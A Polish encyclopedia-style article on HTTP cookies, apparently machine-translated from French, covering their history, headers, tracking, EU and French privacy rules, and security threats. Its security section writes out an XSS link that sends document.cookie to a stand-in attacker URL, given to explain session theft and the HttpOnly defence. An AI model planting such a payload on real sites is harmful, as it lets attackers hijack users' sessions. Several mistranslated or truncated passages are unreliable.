Cookies , połączenie świadkiem lub świadkiem , jest określona przez HTTP protokołu komunikacyjnego jako mały tekst wysyłane przez serwer HTTP do klienta HTTP , który ten ostatni wyśle z powrotem następnym razem, gdy łączy się z serwerami dzielących tę samą nazwę. Domeny .
Wynaleziony w 1994 r. plik cookie to tekst zawierający dowolną sekwencję par klucz-wartość. Pozwala witrynom śledzić internautów, gdy przechodzą z jednej strony na drugą w witrynie, a nawet gdy wracają kilka dni później w przypadku plików cookie przechowywanych na terminalu odwiedzającego. Pliki cookies wykorzystywane są w szczególności do identyfikacji sesji internauty połączonego ze swoim kontem na komputerze . Ogólnie rzecz biorąc, pliki cookie służą do łączenia wszelkich informacji o stanie z wizytą, takich jak preferencje wyświetlania lub zawartość koszyka .
Pliki cookie zawsze były mniej lub bardziej kontrowersyjne, ponieważ umożliwiają śledzenie użytkowników Internetu, którzy odwiedzają pozornie niepowiązane witryny, o ile wszystkie te witryny korzystają z tego samego dostawcy śledzenia sieci , na przykład dystrybutora reklam. Większość przeglądarek internetowych umożliwia użytkownikom zarządzanie plikami cookie (czas przechowywania, selektywne usuwanie). Serwisy przestrzegające dyrektywy z dnia 12 lipca 2002 r. o ochronie prywatności w sektorze łączności elektronicznej umożliwiają również internautom selektywną akceptację plików cookies.
Ponieważ pliki cookie są zazwyczaj przechowywane w prostych plikach tekstowych , nie mogą być wykonywane . Nie są to programy szpiegujące ani wirusy . Jednak pliki cookie, które są używane tylko do śledzenia, są wykrywane przez kilka programów antywirusowych, które oferują ich usunięcie.
Termin cookie wywodzi się od angielskiego terminu magic cookie , który oznacza pakiet danych, który program otrzymuje i zwraca w niezmienionej postaci. Pliki cookie były już wykorzystywane w IT, gdy Lou Montulli wpadł na pomysł wykorzystania ich w komunikacji internetowej wCzerwiec 1994. W tym czasie był zatrudniony w Netscape Communications .
John Giannandrea i Lou Montulli napisali w tym samym roku pierwszą specyfikację plików cookie dla Netscape Navigatora . Mosaic Netscape wersja 0.9 beta , wydana dnia13 października 1994, wbudowana technologia plików cookie. Pierwsze użycie plików cookie (z wyjątkiem eksperymentów) miało na celu ustalenie, czy odwiedzający witrynę Netscape odwiedzili ją wcześniej. Montulli złożył wniosek o patent na technologię ciasteczek w 1995 roku, a patent USA 5 774 670 został przyznany w 1998 roku.
Po zaimplementowaniu w Netscape 0.9 beta w 1994 roku, pliki cookie zostały zintegrowane z Internet Explorerem 2 wydanym w październiku 1995 roku.
Jednak wprowadzenie plików cookie nie było szeroko znane opinii publicznej. W szczególności pliki cookies były domyślnie akceptowane w ustawieniach przeglądarki, a użytkownicy nie byli informowani o ich obecności. Niektórzy ludzie byli świadomi istnienia ciasteczek około pierwszego kwartału 1995 roku, ale opinia publiczna dowiedziała się o ich istnieniu dopiero po opublikowaniu przez Financial Times artykułu na ten temat.12 lutego 1996 r.. W tym samym roku pliki cookie wzbudziły duże zainteresowanie mediów ze względu na możliwe naruszenia prywatności. Temat ciasteczek był omawiany w dwóch konsultacjach Federalnej Komisji Handlu USA w 1996 i 1997 roku.
Prace nad oficjalną specyfikacją ciasteczek już się rozpoczęły. Pierwsze dyskusje na temat oficjalnej specyfikacji miały miejsce w kwietniu 1995 roku na liście mailingowej www-talk. Utworzono specjalną grupę roboczą IETF . Dwie alternatywne propozycje wprowadzenia stanu do transakcji HTTP wysunęli odpowiednio Brian Behlendorf i David Kristol, ale grupa kierowana przez samego Kristola zdecydowała się wykorzystać specyfikację Netscape jako punkt wyjścia. W lutym 1996 roku grupa zadaniowa ustaliła, że pliki cookie stron trzecich stanowią poważne zagrożenie dla prywatności. Specyfikacja wyprodukowana przez grupę została ostatecznie opublikowana jako RFC 2109.
Od końca 2014 roku na wielu stronach pojawia się baner dotyczący plików cookie. Istnieje co najmniej jedno rozszerzenie przeglądarki, które uniemożliwia wyświetlanie banera.
Pliki cookie mogą być używane do przechowywania danych dotyczących użytkownika podczas przeglądania, ale także podczas kilku wizyt. Pliki cookie zostały wprowadzone, aby umożliwić wdrożenie elektronicznych koszyków zakupowych, wirtualnego urządzenia, w którym użytkownik może gromadzić przedmioty, które chce kupić podczas przeglądania witryny.
Obecnie aplikacje takie jak koszyki na zakupy zapisują listę przedmiotów w bazie danych na serwerze, co jest preferowane; niż zapisać je w samym pliku cookie. Serwer WWW wysyła plik cookie zawierający unikalny identyfikator sesji . Przeglądarka internetowa zwraca następnie ten identyfikator sesji przy każdym kolejnym żądaniu, a pozycje w koszyku są zapisywane i powiązane z tym samym unikalnym identyfikatorem sesji.
Częste korzystanie z plików cookie jest przydatne do łączenia się z witryną za pomocą poświadczeń. Krótko mówiąc, serwer sieciowy najpierw wysyła plik cookie zawierający unikalny identyfikator sesji. Następnie użytkownicy podają swoje dane uwierzytelniające (zwykle nazwę użytkownika i hasło). Aplikacja internetowa następnie uwierzytelnia sesję i umożliwia użytkownikowi dostęp do usługi.
Pliki cookie mogą służyć do zapamiętywania informacji o użytkowniku witryny, w celu pokazania mu w przyszłości odpowiedniej treści. Na przykład serwer sieciowy może wysłać plik cookie zawierający ostatnią nazwę użytkownika używaną do połączenia z tą witryną, aby ta nazwa użytkownika mogła być wstępnie wypełniona podczas przyszłych wizyt.
Wiele stron internetowych wykorzystuje pliki cookie do personalizacji w oparciu o preferencje użytkownika. Użytkownicy wybierają swoje preferencje w formularzu i przesyłają je na serwer. Serwer koduje preferencje w pliku cookie i odsyła je z powrotem do przeglądarki. Następnie za każdym razem, gdy użytkownik uzyskuje dostęp do strony tej witryny, przeglądarka odsyła plik cookie, a tym samym listę preferencji; serwer może wówczas dostosować stronę zgodnie z preferencjami użytkownika. Na przykład witryna Wikipedia pozwala swoim użytkownikom wybrać preferowaną skórkę witryny. Wyszukiwarka Google pozwala swoim użytkownikom (nawet jeśli nie są zarejestrowani) wybrać liczbę wyników, które chcą zobaczyć na każdej stronie wyników.
Śledzące pliki cookie (lub śledzące) są używane do śledzenia nawyków przeglądania użytkowników Internetu. Można to również częściowo zrobić, używając adresu IP komputera wysyłającego żądanie dla strony lub używając „odwołującego się” nagłówka HTTP, który klient wysyła przy każdym żądaniu, ale pliki cookie umożliwiają większą precyzję. Można to zrobić jak w poniższym przykładzie:
Przeglądając plik dziennika, można wtedy zobaczyć, które strony odwiedził użytkownik iw jakiej kolejności. Na przykład, jeśli plik zawiera kilka żądań wykonanych przy użyciu pliku cookie id = abc, może ustalić, że wszystkie te żądania pochodzą od tego samego użytkownika. Żądany adres URL, data i godzina związane z żądaniami umożliwiają śledzenie nawigacji użytkownika.
Zewnętrzne pliki cookie i sygnalizatory WWW , wyjaśnione poniżej, dodatkowo umożliwiają śledzenie w różnych witrynach. Śledzenie pojedynczych witryn jest zwykle używane do celów statystycznych. Natomiast śledzenie w witrynach za pomocą plików cookie stron trzecich jest zwykle wykorzystywane przez firmy reklamowe do generowania anonimowych profili użytkowników (które są następnie wykorzystywane do określenia, które reklamy powinny być wyświetlane użytkownikowi i, jeśli znany jest adres e-mail użytkownika, do wysłania mu wiadomości e-mail odpowiadające tym reklamom).
Śledzące pliki cookie stanowią zagrożenie dla prywatności użytkownika, ale można je łatwo usunąć. Najnowsze przeglądarki zawierają opcję automatycznego usuwania trwałych plików cookie po zamknięciu aplikacji.
Obrazy i inne obiekty zawarte na stronie internetowej mogą znajdować się na innych serwerach niż ten, na którym znajduje się strona. Aby wyświetlić stronę, przeglądarka pobiera wszystkie te obiekty. Większość stron internetowych zawiera informacje z różnych źródeł. Na przykład, jeśli wpiszesz www.example.com w przeglądarce, często na części strony pojawią się obiekty lub reklamy pochodzące z różnych źródeł, tj. z domeny innej niż www .example.com. Własne pliki cookie to pliki cookie, które są ustawiane przez domenę wprowadzoną w pasku adresu przeglądarki. Pliki cookie stron trzecich są ustawiane przez jeden z obiektów strony, które pochodzą z innej domeny.
Domyślnie przeglądarki takie jak Mozilla Firefox , Microsoft Internet Explorer i Opera akceptują pliki cookie innych firm, ale użytkownicy mogą zmienić ustawienia w opcjach przeglądarki, aby je zablokować. Nie ma żadnego zagrożenia bezpieczeństwa związanego z plikami cookie stron trzecich, które umożliwiają funkcjonalność sieci, jednak są one również używane do śledzenia użytkowników Internetu od strony do strony. Od 2022 r. wielcy gracze, tacy jak Google, ogłosili, że zrezygnują z plików cookie stron trzecich, co będzie miało poważne konsekwencje dla marketingu.
Narzędzia takie jak Ghostery dostępne dla wszystkich przeglądarek umożliwiają blokowanie wymiany między stronami trzecimi.
Cookies to niewielkie porcje danych wysyłane przez serwer WWW do przeglądarki. Przeglądarka zwraca je do serwera w niezmienionej postaci, wprowadzając do transakcji HTTP stan (pamięć poprzednich zdarzeń), który w innym przypadku byłby bezstanowy. Bez plików cookie każde pobranie strony internetowej lub jej komponentu jest odosobnionym zdarzeniem, niezależnym od innych żądań wysyłanych w tej samej witrynie. Oprócz możliwości ustawienia przez serwer sieciowy, pliki cookie można również ustawiać za pomocą języków skryptowych, takich jak JavaScript , jeśli jest to obsługiwane i autoryzowane przez przeglądarkę.
Oficjalna specyfikacja plików cookie sugeruje, że przeglądarki mogą przechowywać i zwracać minimalną liczbę plików cookie. W szczególności przeglądarka powinna być w stanie przechowywać co najmniej 300 plików cookie po cztery kilobajty każdy i co najmniej 20 plików cookie dla jednego serwera lub domeny.
Zgodnie z sekcją 3.1 RFC 2965, nazwy plików cookie są odporne na uszkodzenia .
Plik cookie może określić datę wygaśnięcia, w którym to przypadku plik cookie zostanie usunięty w tym dniu. Jeśli plik cookie nie określa daty ważności, plik cookie jest usuwany, gdy tylko użytkownik zamknie przeglądarkę. W rezultacie określenie daty wygaśnięcia jest sposobem na przetrwanie pliku cookie w wielu sesjach. Z tego powodu pliki cookie z datą ważności są uważane za trwałe . Przykładowa aplikacja: witryna sprzedaży może używać trwałych plików cookie do rejestrowania pozycji, które użytkownicy umieścili w swoim koszyku (w rzeczywistości plik cookie może odnosić się do wpisu zapisanego w bazie danych na stronie, a nie na Twoim komputerze). Oznacza to, że jeśli użytkownicy wyjdą z przeglądarki bez dokonania zakupu i wrócą do niej później, będą mogli ponownie znaleźć produkty w koszyku. Jeśli te pliki cookie nie podałyby daty ważności, wygasłyby wraz z zamknięciem przeglądarki, a informacje o zawartości koszyka zostałyby utracone.
Pliki cookie mogą być ograniczone w zakresie do określonej domeny, subdomeny lub ścieżki na serwerze, który je utworzył.
Przesyłanie stron internetowych odbywa się za pomocą protokołu przesyłania hipertekstu (HTTP). Ignorując pliki cookie, przeglądarki wywołują stronę z serwerów internetowych, zwykle wysyłając im krótki tekst zwany żądaniem HTTP . Na przykład, aby uzyskać dostęp do strony www.example.org/index.html, przeglądarki łączą się z serwerem www.example.org i wysyłają żądanie, które wygląda tak:
| GET /index.html HTTP/1.1 Host: www.example.org | ||
| Nawigator | → | serwer |
Serwer odpowiada wysyłając żądaną stronę poprzedzoną podobnym tekstem, a całość nazywana jest odpowiedzią HTTP . Ten pakiet może zawierać wiersze z prośbą do przeglądarki o przechowywanie plików cookie:
| HTTP/1.1 200 OK Content-type: text/html Set-Cookie: nom=valeur (page HTML) | ||
| Nawigator | ← | serwer |
Serwer wysyła linię tylko Set-Cookiewtedy, gdy serwer chce, aby przeglądarka przechowywała plik cookie. Set-Cookiejest żądaniem do przeglądarki, aby przechować ciąg nom=valeuri zwrócić go we wszystkich przyszłych żądaniach do serwera. Jeśli przeglądarka obsługuje pliki cookie, a pliki cookie są włączone w opcjach przeglądarki, plik cookie zostanie uwzględniony we wszystkich kolejnych żądaniach kierowanych do tego samego serwera. Na przykład przeglądarka wywołuje stronę www.example.org/news.html, wysyłając do serwera www.example.org następujące żądanie:
| GET /news.html HTTP/1.1 Host: www.example.org Cookie: nom=valeur Accept: */* | ||
| Nawigator | → | serwer |
Jest to żądanie innej strony z tego samego serwera i różni się od pierwszego powyżej tym, że zawiera ciąg, który serwer wcześniej wysłał do przeglądarki. Dzięki temu serwer wie, że to żądanie jest powiązane z poprzednim. Serwer odpowiada wysyłając wywołaną stronę, a także dodając inne pliki cookie.
Wartość ciasteczka może być modyfikowana przez serwer poprzez wysłanie nowej linii Set-Cookie: nom=nouvelle_valeurw odpowiedzi na wywołaną stronę. Przeglądarka następnie zastępuje starą wartość nową.
Wiersz Set-Cookiejest zwykle tworzony przez program CGI lub inny język skryptowy, a nie przez serwer HTTP. Serwer HTTP (przykład: Apache ) prześle do przeglądarki tylko wynik działania programu (dokument poprzedzony nagłówkiem zawierającym ciasteczka).
Pliki cookie mogą być również ustawiane przez JavaScript lub inne podobne języki wykonywane w przeglądarce, tj. po stronie klienta, a nie po stronie serwera. W JavaScript obiekt document.cookiesłuży do tego celu. Na przykład instrukcja document.cookie = "température=20"tworzy plik cookie o nazwie „temperatura” o wartości 20.
Oprócz pary nazwa/wartość plik cookie może również zawierać datę wygaśnięcia, ścieżkę, nazwę domeny oraz rodzaj zamierzonego połączenia, tzn. w postaci jawnej lub zaszyfrowanej. RFC 2965 definiuje również, że ciasteczka powinny być obowiązkowe numer wersji, ale zazwyczaj jest to pominięte. Te fragmenty danych podążają za parą nom=nouvelle_valeuri są oddzielone średnikami. Na przykład plik cookie może zostać utworzony przez serwer, wysyłając linię Set-Cookie: nom=nouvelle_valeur; expires=date; path=/; domain=.exemple.org.
Pliki cookie wygasają i nie są wówczas wysyłane przez przeglądarkę na serwer w następujących sytuacjach:
Trzecia sytuacja umożliwia serwerom lub skryptom jawne usunięcie pliku cookie. Należy pamiętać, że przeglądarka internetowa Google Chrome umożliwia poznanie daty wygaśnięcia określonego pliku cookie, uzyskując dostęp do ustawień treści. Plik cookie przechowywany na komputerze może pozostać tam przez kilka dziesięcioleci, jeśli nie zostanie wykonana żadna procedura, aby go usunąć.
Od czasu ich wprowadzenia w Internecie, w Internecie i mediach krążyło wiele pomysłów na temat plików cookie. W 1998 r. CIAC , zespół monitorujący incydenty komputerowe Departamentu Energii Stanów Zjednoczonych , ustalił, że luki w zabezpieczeniach plików cookie „w zasadzie nie istnieją” i wyjaśnił, że „informacje o pochodzeniu odwiedzin i szczegółowe informacje na temat odwiedzanych stron internetowych już istnieją w plikach dziennika serwerów WWW ”. W 2005 roku Jupiter Research opublikował wyniki badania, w którym znaczny odsetek respondentów uwzględnił następujące twierdzenia:
Pliki cookie nie mogą usuwać ani odczytywać informacji z komputera użytkownika. Jednak pliki cookie umożliwiają wykrycie stron internetowych odwiedzanych przez użytkownika w danej witrynie lub zestawie witryn. Informacje te mogą być gromadzone w profilu użytkownika, który można wykorzystać lub odsprzedać stronom trzecim, co może stwarzać poważne obawy dotyczące prywatności. Niektóre profile są anonimowe, tzn. nie zawierają danych osobowych, jednak nawet takie profile mogą budzić wątpliwości.
Według tego samego badania duży odsetek internautów nie wie, jak usunąć pliki cookie. Jednym z powodów, dla których ludzie nie ufają plikom cookie, jest to, że niektóre witryny nadużywają aspektu plików cookie umożliwiającego identyfikację osób i udostępniają te informacje innym źródłom. Duży odsetek ukierunkowanych reklam i niechcianych wiadomości e-mail, uznawanych za spam, pochodzi z informacji zebranych przez śledzące pliki cookie.
W rzeczywistości ciasteczka, które początkowo nie zostały stworzone w celu realizacji reklam komercyjnych, dały początek całej branży reklamowej, która według przewodniczącego komisji cyfrowej Unii firm zajmujących się kupnem mediów i firm konsultingowych „Udziela informacji na temat Internauci, w szczególności ich zainteresowanie konkretnym produktem, być może zamiar zakupu” .
Usunięcie plików cookie stron trzecich planowane na lata 2020-2022 ma na celu ograniczenie tych wad, ale może przynieść korzyści GAFAM-om ze szkodą dla innych reklamodawców. GAFAM-y, które już posiadają trzy czwarte francuskiego rynku, pojawią się wzmocnione lepiej ukierunkowanymi technologiami reklamowymi.
Większość przeglądarek obsługuje pliki cookie i umożliwia użytkownikowi ich wyłączenie. Najczęstsze opcje to:
Większość przeglądarek umożliwia również całkowite usunięcie danych osobowych, w tym plików cookie. Istnieją również dodatkowe moduły do kontroli uprawnień do plików cookie.
Pliki cookie mają istotny wpływ na prywatność i anonimowość użytkowników sieci. Chociaż pliki cookie są wysyłane z powrotem tylko do serwera, który je utworzył lub do serwera należącego do tej samej domeny internetowej, strona internetowa może jednak zawierać obrazy lub inne komponenty przechowywane na serwerach należących do innych domen. Pliki cookie, które są ustawiane podczas odzyskiwania tych zewnętrznych komponentów, nazywane są plikami cookie stron trzecich . Obejmuje to pliki cookie z niechcianych wyskakujących okienek.
Firmy reklamowe używają plików cookie stron trzecich do śledzenia użytkowników przez różne odwiedzane przez nich witryny. W szczególności firma reklamowa może śledzić użytkownika na wszystkich stronach, na których umieściła obrazy reklamowe lub piksel śledzący . Znajomość stron odwiedzanych przez użytkownika pozwala firmie reklamowej na ukierunkowanie na preferencje reklamowe użytkownika.
Możliwość budowania profilu użytkownika jest postrzegana przez niektórych jako naruszenie prywatności, zwłaszcza gdy śledzenie odbywa się w różnych domenach za pomocą plików cookie stron trzecich. Z tego powodu w niektórych krajach obowiązują przepisy dotyczące plików cookie.
Rząd Stanów Zjednoczonych wdrożył surowe zasady dotyczące ustawiania plików cookie w 2000 roku, po tym jak ujawniono, że Biuro Polityki Narkotykowej Białego Domu używa plików cookie do śledzenia komputerów użytkowników oglądających online reklamy narkotyków. W 2002 roku aktywista ochrony prywatności Daniel Brandt odkrył, że CIA pozostawiła trwałe pliki cookie na komputerach, które odwiedziły jej strony internetowe. Po poinformowaniu o tym naruszeniu CIA oświadczyła, że te pliki cookie nie zostały celowo wysłane i przestała je ustawiać. 25 grudnia 2005 r. Brandt odkrył, że Agencja Bezpieczeństwa Narodowego (NSA) pozostawiła na komputerach odwiedzających dwa trwałe pliki cookie z powodu aktualizacji oprogramowania. Po otrzymaniu informacji NSA natychmiast dezaktywowała pliki cookie.
W Wielkiej Brytanii „ Prawo dotyczące plików cookie ”, które weszło w życie 25 maja 2012 r., zobowiązuje witryny do deklarowania swoich zamiarów, umożliwiając tym samym użytkownikom wybór, czy chcą pozostawić ślady swojego przejścia w Internecie. W ten sposób można je chronić przed kierowaniem reklam. Jednak według The Guardian zgoda internautów niekoniecznie jest wyraźna; dokonano modyfikacji warunków zgody użytkownika, czyniąc ją dorozumianą.
Dyrektywa 2002/58 o prywatności i łączności elektronicznej , zawiera przepisy dotyczące korzystania z plików cookie. W szczególności art. 5 ust. 3 tej dyrektywy wymaga, aby przechowywanie danych (takich jak pliki cookie) na komputerze użytkownika było możliwe tylko wtedy, gdy:
Zgodnie ze sprawozdaniem z grudnia 2004 r., które miało wejść w życie od października 2003 r., dyrektywa została jednak wprowadzona w życie w bardzo niedoskonały sposób, zgodnie ze sprawozdaniem z grudnia 2004 r., w którym wskazano również, że niektóre państwa członkowskie ( Słowacja , Łotwa , Grecja , Belgia i Luksemburg ) nie dokonały jeszcze transpozycji dyrektywy. do prawa krajowego.
Zgodnie z opinią G29 z 2010 r. ta dyrektywa, która warunkuje w szczególności wykorzystywanie plików cookie do celów reklamy behawioralnej za wyraźną zgodą internauty, pozostaje bardzo słabo stosowana. W rzeczywistości większość witryn robi to w sposób niezgodny z dyrektywą, ograniczając się do prostego „banera” informującego o używaniu plików „cookies” bez podawania informacji o ich zastosowaniu, bez rozróżniania „technicznych” plików cookie „śledzące” pliki cookie, ani oferować rzeczywistego wyboru użytkownikowi, który chce zachować techniczne pliki cookie (takie jak pliki cookie zarządzania koszykiem) i odmówić „śledzących” plików cookie. W rzeczywistości wiele witryn nie działa prawidłowo, jeśli pliki cookie są odrzucane, co jest niezgodne z dyrektywą 2002/58 lub dyrektywą 95/46 (Ochrona danych osobowych).
Dyrektywa 2009/136/WEKwestia ta została zaktualizowana dyrektywą 2009/136/CE z dnia 25 listopada 2009 r., która wskazuje, że „przechowywanie informacji lub uzyskiwanie dostępu do informacji już przechowywanych w urządzeniu końcowym abonenta lub użytkownika jest dozwolone tylko pod warunkiem, że abonent lub użytkownik wyraził zgodę, po otrzymaniu, zgodnie z dyrektywą 95/46/WE , jasnych i pełnych informacji między innymi na temat celów przetwarzania ”. Nowa dyrektywa wzmacnia zatem obowiązki przed umieszczeniem plików cookie na komputerze internauty.
We wstępnych rozważaniach dyrektywy ustawodawca europejski precyzuje jednak: „Tam, gdzie jest to technicznie możliwe i skuteczne, zgodnie z odpowiednimi przepisami dyrektywy 95/46/WE, zgoda użytkownika na przetwarzanie może być wyrażona poprzez korzystanie z odpowiednich ustawień przeglądarki lub innej aplikacji ”. Ale w rzeczywistości żadna przeglądarka do tej pory nie pozwalała oddzielić niezbędnych technicznych plików cookie od opcjonalnych, które należy pozostawić do wyboru użytkownika.
Ta nowa dyrektywa została transponowana przez posłów belgijskich w lipcu 2012 r. Badanie z 2014 r. pokazuje, że nawet posłowie mają trudności z zastosowaniem ograniczeń dyrektywy.
Limity CNILWe Francji Rada Stanu uważa, że CNIL nie może „prawnie zabronić (…)„ciasteczek cookie”, praktyki polegającej na blokowaniu dostępu do strony internetowej w przypadku odmowy przyjęcia plików cookie”: „Potrącając taki zakaz jedyny wymóg dobrowolnej zgody użytkownika na deponowanie znaczników przewidziany w europejskim rozporządzeniu o ochronie danych RGPD , CNIL przekroczył to, co mógł legalnie zrobić ”.
Specyfikacja P3P obejmuje możliwość określenia przez serwer polityki prywatności, która określa, jakie informacje gromadzi i w jakim celu. Zasady te obejmują (ale nie ograniczają się do) wykorzystanie informacji zebranych za pomocą plików cookie. Zgodnie z definicjami P3P, przeglądarka może akceptować lub odrzucać pliki cookies porównując politykę prywatności z preferencjami użytkownika lub pytając użytkownika o przedstawienie polityki w tym zakresie o ochronę prywatności deklarowaną przez serwer.
Wiele przeglądarek, w tym Apple Safari i Microsoft Internet Explorer w wersji 6 i 7, obsługuje P3P, który pozwala przeglądarce określić, czy akceptuje przechowywanie plików cookie stron trzecich. Przeglądarka Opera umożliwia użytkownikom odrzucanie plików cookie stron trzecich oraz tworzenie globalnego i specyficznego profilu bezpieczeństwa dla domen internetowych. Mozilla Firefox w wersji 2 zaprzestała obsługi P3P, ale przywróciła ją w wersji 3.
Pliki cookie stron trzecich mogą być blokowane przez większość przeglądarek w celu zwiększenia prywatności i ograniczenia śledzenia reklam, bez negatywnego wpływu na korzystanie z Internetu przez użytkownika. Wiele sieci reklamowych oferuje opcję rezygnacji z reklamy ukierunkowanej, ustawiając ogólny plik cookie w przeglądarce, który dezaktywuje to kierowanie, ale takie rozwiązanie nie jest praktycznie skuteczne, jeśli jest przestrzegane, ponieważ ten ogólny plik cookie jest usuwany, gdy tylko użytkownik usuwa te pliki cookie, co anuluje decyzję o rezygnacji.
Oprócz obaw związanych z prywatnością pliki cookie mają również pewne wady techniczne. W szczególności nie zawsze dokładnie identyfikują użytkowników, mogą spowalniać działanie witryn przy dużej liczbie, mogą być wykorzystywane do ataków na bezpieczeństwo i stoją w opozycji do reprezentatywnego przekazywania stanu, stylu architektonicznego oprogramowania.
Jeśli na komputerze używana jest więcej niż jedna przeglądarka, w każdej z nich zawsze znajduje się osobna jednostka do przechowywania plików cookie. Dlatego pliki cookie nie identyfikują osoby, ale połączenie konta użytkownika, komputera i przeglądarki internetowej. W ten sposób każdy może korzystać z tych kont, komputerów lub przeglądarek, które mają ustawiony plik cookie. Podobnie pliki cookie nie rozróżniają wielu użytkowników korzystających z tego samego konta użytkownika, komputera i przeglądarki, tak jak w „kawiarenkach internetowych” lub innych miejscach zapewniających swobodny dostęp do zasobów komputera.
Jednak w praktyce twierdzenie to w większości przypadków okazuje się błędne z uwagi na fakt, że dzisiaj komputer "osobisty" (lub smartfon, czy też tablet co gorsza) jest używany głównie przez jedną osobę, konkretną osobę i poprzez ilość zebranych informacji dociera do spersonalizowanego targetowania, nawet jeśli dana osoba nie jest zidentyfikowana „z nazwiska”.
Podczas normalnej pracy pliki cookies są przesyłane między serwerem (lub grupą serwerów w tej samej domenie) a przeglądarką komputera użytkownika. Ponieważ pliki cookie mogą zawierać poufne informacje (nazwę użytkownika, hasło używane do uwierzytelniania itp. ), ich wartości nie powinny być dostępne dla innych komputerów. Kradzież plików cookie to przechwycenie plików cookie przez nieuprawnioną osobę trzecią.
Ciasteczka mogą zostać skradzione przez sniffer pakietów w ataku zwanym przejmowaniem sesji. Ruch w Internecie mogą zostać przechwycone i odczytane przez komputery innych niż wysyłanie i odbieranie (zwłaszcza w przestrzeni publicznej bezprzewodowej non zaszyfrowanej ). Ten ruch obejmuje pliki cookie wysyłane przez sesje przy użyciu zwykłego protokołu HTTP . Gdy ruch sieciowy nie jest szyfrowany, złośliwi użytkownicy mogą w ten sposób odczytywać wiadomości od innych użytkowników w sieci za pomocą „snifferów pakietów”.
Ten problem można rozwiązać, szyfrując połączenie między komputerem użytkownika a serwerem za pomocą protokołu HTTPS . Serwer może określić flagę bezpieczeństwa podczas ustawiania pliku cookie; przeglądarka wyśle je tylko przez bezpieczną linię, taką jak połączenie SSL .
Jednak wiele witryn, chociaż używa szyfrowanej komunikacji HTTPS do uwierzytelniania użytkownika (tj. strony logowania), później wysyła pliki cookie sesji i inne dane normalnie przez nieszyfrowane połączenia HTTP ze względu na wydajność. Atakujący mogą w ten sposób przechwytywać pliki cookie od innych użytkowników i podszywać się pod nich w odpowiednich witrynach lub wykorzystując je w atakach na pliki cookie.
Innym sposobem kradzieży plików cookie jest tworzenie skryptów na stronach i wysyłanie plików cookie przez przeglądarkę na złośliwe serwery, które nigdy ich nie otrzymują. Nowoczesne przeglądarki umożliwiają wykonanie wyszukanych fragmentów kodu z serwera. Jeśli pliki cookie są dostępne w czasie wykonywania, ich wartości mogą być przekazywane w jakiejś formie do serwerów, które nie powinny mieć do nich dostępu. Szyfrowanie plików cookie przed wysłaniem przez sieć nie pomaga w przeciwdziałaniu atakowi.
Ten rodzaj skryptów w witrynie jest zwykle stosowany przez osoby atakujące w witrynach, które umożliwiają użytkownikom publikowanie treści HTML. Integrując kompatybilną część kodu z wkładem HTML, atakujący może otrzymywać pliki cookie od innych użytkowników. Znajomość tych plików cookie może być wykorzystana po zalogowaniu się do tej samej witryny przy użyciu skradzionych plików cookie, dzięki czemu zostaniesz rozpoznany jako użytkownik, którego pliki cookie zostały skradzione.
Jednym ze sposobów zapobiegania takim atakom jest użycie flagi HttpOnly ; jest to opcja wprowadzona w 2002 roku w wersji 6 SP1 Internet Explorera i dostępna w PHP od wersji 5.2.0. Ta opcja ma na celu uniemożliwienie przeglądarce dostępu do pliku cookie poprzez wykonanie skryptów (najczęściej javascript). Twórcy stron internetowych powinni uwzględnić tę opcję podczas tworzenia swoich witryn, aby byli odporni na dostęp do plików cookie, zwłaszcza sesyjnych, poprzez wykonywanie skryptów w przeglądarce użytkownika.
Innym stosowanym zagrożeniem bezpieczeństwa jest tworzenie popytu w witrynie.
Oficjalna specyfikacja techniczna zezwala na zwracanie plików cookie tylko na serwery w domenie, z której pochodzą. Jednak wartość plików cookie może zostać przesłana do innych serwerów przy użyciu innych środków niż nagłówki plików cookie.
W szczególności języki skryptowe, takie jak JavaScript, generalnie mają dostęp do wartości plików cookie i są w stanie wysyłać dowolne wartości do dowolnego serwera w Internecie. Ta funkcja skryptów jest używana w witrynach internetowych, umożliwiając użytkownikom publikowanie treści HTML, które mogą zobaczyć inni użytkownicy.
Na przykład atakujący działający w domenie example.com może opublikować komentarz zawierający następujący link wskazujący na popularny blog, którego w inny sposób nie kontroluje:
<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>
Gdy inny użytkownik kliknie ten link, przeglądarka wykonuje część kodową atrybutu onclick, zastępując ciąg znaków document.cookielistą plików cookie użytkownika, które są aktywne dla tej strony. W związku z tym ta lista plików cookie jest wysyłana do serwera example.com, dzięki czemu atakujący może zbierać pliki cookie od tego użytkownika.
Ten rodzaj ataku jest trudny do wykrycia po stronie użytkownika, ponieważ skrypt pochodzi z tej samej domeny, która ustawiła ciasteczko, a operacja wysyłania wartości wydaje się dozwolona przez tę domenę. Uważa się, że administratorzy obsługujący takie strony są odpowiedzialni za wprowadzenie ograniczeń uniemożliwiających publikację złośliwego kodu.
Pliki cookie nie są bezpośrednio widoczne dla programów po stronie klienta, takich jak JavaScript, jeśli zostały wysłane z flagą HttpOnly. Z punktu widzenia serwera jedyną różnicą jest to, że w wierszu nagłówka Set-Cookiedodawane jest nowe pole zawierające ciąg znaków HttpOnly :
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly
Kiedy przeglądarka otrzyma takie ciasteczko, powinna normalnie z niego korzystać w kolejnej wymianie HTTP, ale bez pokazywania go skryptom działającym po stronie klienta. Flaga HttpOnlynie jest częścią żadnej oficjalnej specyfikacji technicznej i nie jest zaimplementowana we wszystkich przeglądarkach. Zauważ, że obecnie nie ma sposobu, aby zapobiec odczytywaniu i zapisywaniu ciasteczek sesji za pomocą metody XMLHTTPRequest .
Gdy tylko pliki cookie muszą być przechowywane i zwracane na serwer w niezmienionej postaci, atakujący może zmodyfikować wartość plików cookie, zanim zostaną one zwrócone na serwer. Na przykład, jeśli plik cookie zawiera całkowitą wartość, jaką użytkownik musi zapłacić za produkty umieszczone w koszyku, zmiana tej wartości powoduje, że serwer jest narażony na ryzyko, że atakujący zapłaci mniej niż cena wywoławcza. Proces zmiany wartości plików cookie nazywa się zatruciem plikami cookie i może być wykorzystany po kradzieży plików cookie, aby atak był trwały.
Większość stron internetowych przechowuje jednak tylko identyfikator sesji - unikalny, losowo wygenerowany numer służący do identyfikacji sesji użytkownika - w samym pliku cookie, podczas gdy wszystkie inne informacje są przechowywane na serwerze cookie. W tym przypadku problem ten jest w dużej mierze rozwiązany.
